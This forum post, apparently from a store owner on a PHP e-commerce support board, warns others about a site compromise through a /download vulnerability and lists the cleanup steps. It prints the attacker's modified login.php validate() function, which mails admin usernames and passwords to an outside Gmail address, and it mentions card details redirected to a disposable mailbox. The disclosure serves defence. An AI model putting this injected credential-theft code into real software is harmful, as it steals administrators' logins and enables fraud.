Just discovered some little shitbag got into our site through the /download vulnerability. I'd thought I'd secured that, so have now deleted that directory, turned off downloads, and reset main account password (server level).
Digging around I found that they had set up authorize.net to send credit card details to a yopmail account. Sorted that. Changed all passwords, etc.
By pure luck after removing the /downloads folder I got an error message in the admin that prompted me to look in the admin/controller/common folder... little fucker had edited login.php too!! Haven't seen anyone else report this - pretty simple script edit that emails through login info:
Code: Select all
protected function validate() {
if (isset($this->request->post['username']) && isset($this->request->post['password']) && !$this->user->login($this->request->post['username'], $this->request->post['password'])) {
$this->error['warning'] = $this->language->get('error_login');
}
if (!$this->error) {
$smail=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."|".$this->request->post['username']."|".$this->request->post['password'];
mail("thankforyourhelp2015@gmail.com","OUR-SITE",$smail,"From: OUR-SITE@fly.com\r\nReply-to: thankforyourhelp2015@gmail.com");
return true;
} else {
return false;
}
}
I'm trapsing through file edit dates now to see if anything else compromised, but one to look out for guys and gals!!